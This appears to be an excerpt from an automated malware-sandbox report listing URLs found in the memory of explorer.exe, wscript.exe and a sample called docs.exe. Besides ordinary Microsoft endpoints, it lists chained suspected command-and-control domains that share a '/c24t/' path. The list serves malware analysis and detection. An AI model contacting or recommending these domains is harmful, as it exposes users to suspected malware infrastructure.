          Source: explorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.472.top/c24t/www.earing-tests-69481.bond
          Source: explorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.472.topReferer:
          Source: explorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.aithful.events
          Source: explorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.aithful.events/c24t/
          Source: explorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.aithful.events/c24t/www.amilablackwell.online
          Source: explorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.aithful.eventsReferer:
          Source: explorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.amilablackwell.online
          Source: explorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.amilablackwell.online/c24t/
          Source: explorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.amilablackwell.online/c24t/www.eviewmadu.top
          Source: explorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.amilablackwell.onlineReferer:
          Source: explorer.exe, 00000006.00000003.2981207775.000000000C3E9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986623556.000000000C40D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2163588037.000000000C3E9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
          Source: explorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.consuyt.xyz
          Source: explorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.consuyt.xyz/c24t/
          Source: explorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.consuyt.xyz/c24t/www.hecreature.tech
          Source: explorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.consuyt.xyzReferer:
          Source: explorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.delark.click
          Source: explorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.delark.click/c24t/
          Source: explorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.delark.click/c24t/www.ridges-freezers-56090.bond
          Source: explorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.delark.clickReferer:
          Source: explorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ealerslot.net
          Source: explorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ealerslot.net/c24t/
          Source: explorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ealerslot.net/c24t/www.aithful.events
          Source: explorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ealerslot.netReferer:
          Source: explorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.earing-tests-69481.bond
          Source: explorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.earing-tests-69481.bond/c24t/
          Source: explorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.earing-tests-69481.bond/c24t/www.delark.click
          Source: explorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.earing-tests-69481.bondReferer:
          Source: explorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.eviewmadu.top
          Source: explorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.eviewmadu.top/c24t/
          Source: explorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.eviewmadu.top/c24t/www.khizmetlergirisyapzzz2024.net
          Source: explorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.eviewmadu.topReferer:
          Source: explorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.hecreature.tech
          Source: explorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.hecreature.tech/c24t/
          Source: explorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.hecreature.tech/c24t/www.ealerslot.net
          Source: explorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.hecreature.techReferer:
          Source: explorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.j88.travel
          Source: explorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.j88.travel/c24t/
          Source: explorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.j88.travel/c24t/www.venir-bienne.info
          Source: explorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.j88.travelReferer:
          Source: explorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.khizmetlergirisyapzzz2024.net
          Source: explorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.khizmetlergirisyapzzz2024.net/c24t/
          Source: explorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.khizmetlergirisyapzzz2024.net/c24t/www.23fd595ig.autos
          Source: explorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.khizmetlergirisyapzzz2024.netReferer:
          Source: explorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.oko.events
          Source: explorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.oko.events/c24t/
          Source: explorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.oko.events/c24t/www.consuyt.xyz
          Source: explorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.oko.eventsReferer:
          Source: explorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ridges-freezers-56090.bond
          Source: explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ridges-freezers-56090.bond/c24t/
          Source: explorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ridges-freezers-56090.bondReferer:
          Source: explorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.uijiuw.top
          Source: explorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.uijiuw.top/c24t/
          Source: explorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.uijiuw.top/c24t/www.oko.events
          Source: explorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.uijiuw.topReferer:
          Source: explorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.venir-bienne.info
          Source: explorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.venir-bienne.info/c24t/
          Source: explorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.venir-bienne.info/c24t/www.472.top
          Source: explorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.venir-bienne.infoReferer:
          Source: explorer.exe, 00000006.00000000.2158468861.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979257324.00000000099AB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp
          Source: explorer.exe, 00000006.00000000.2163588037.000000000BFDF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
          Source: explorer.exe, 00000006.00000000.2157815827.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4603162290.000000000962B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/
          Source: explorer.exe, 00000006.00000000.2157815827.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4603162290.000000000962B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/I
          Source: explorer.exe, 00000006.00000000.2157815827.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4603162290.000000000973C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
          Source: explorer.exe, 00000006.00000000.2157815827.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4603162290.000000000962B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?
          Source: explorer.exe, 00000006.00000002.4600082648.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3077028884.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2154066848.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3727707156.0000000007414000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=435B7A89D7D74BDF801F2DA188906BAF&timeOut=5000&oc
          Source: explorer.exe, 00000006.00000002.4600082648.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2157815827.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3077028884.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2154066848.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3727707156.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4603162290.000000000973C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
          Source: explorer.exe, 00000006.00000000.2157815827.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4603162290.000000000973C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.com
          Source: explorer.exe, 00000006.00000000.2154066848.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
          Source: explorer.exe, 00000006.00000000.2154066848.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3727707156.0000000007414000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehwh2.svg
          Source: explorer.exe, 00000006.00000003.3727707156.0000000007414000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
          Source: explorer.exe, 00000006.00000003.3727707156.0000000007414000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
          Source: explorer.exe, 00000006.00000002.4600082648.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3077028884.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2154066848.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3727707156.0000000007414000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMhz
          Source: explorer.exe, 00000006.00000002.4600082648.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3077028884.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2154066848.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3727707156.0000000007414000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMhz-dark
          Source: explorer.exe, 00000006.00000003.3077968513.000000000C086000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2987216711.000000000C086000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2163588037.000000000C048000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4606870784.000000000C071000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986355937.000000000C06D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com-
          Source: explorer.exe, 00000006.00000003.3727707156.0000000007414000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
          Source: explorer.exe, 00000006.00000002.4600082648.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3077028884.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2154066848.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3727707156.0000000007414000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAzME7S.img
          Source: explorer.exe, 00000006.00000003.3077968513.000000000C086000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2987216711.000000000C086000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2163588037.000000000C048000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4606870784.000000000C071000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986355937.000000000C06D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.come
          Source: explorer.exe, 00000006.00000002.4606649141.000000000BFEF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2163588037.000000000BFEF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.comEMd
          Source: explorer.exe, 00000006.00000002.4600082648.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3077028884.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2154066848.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3727707156.0000000007414000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
          Source: explorer.exe, 00000006.00000002.4600082648.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3077028884.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2154066848.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3727707156.0000000007414000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
          Source: explorer.exe, 00000006.00000003.3075948830.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4603707608.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2158468861.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3727477538.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979257324.00000000099AB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/e
          Source: explorer.exe, 00000006.00000003.3077968513.000000000C086000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2987216711.000000000C086000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2163588037.000000000C048000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4606870784.000000000C071000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986355937.000000000C06D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.comM
          Source: explorer.exe, 00000006.00000002.4608809096.000000001079F000.00000004.80000000.00040000.00000000.sdmp, wscript.exe, 00000008.00000002.4586831233.000000000480C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000002.4590765350.0000000004FEF000.00000004.10000000.00040000.00000000.sdmp, docs.exeString found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0
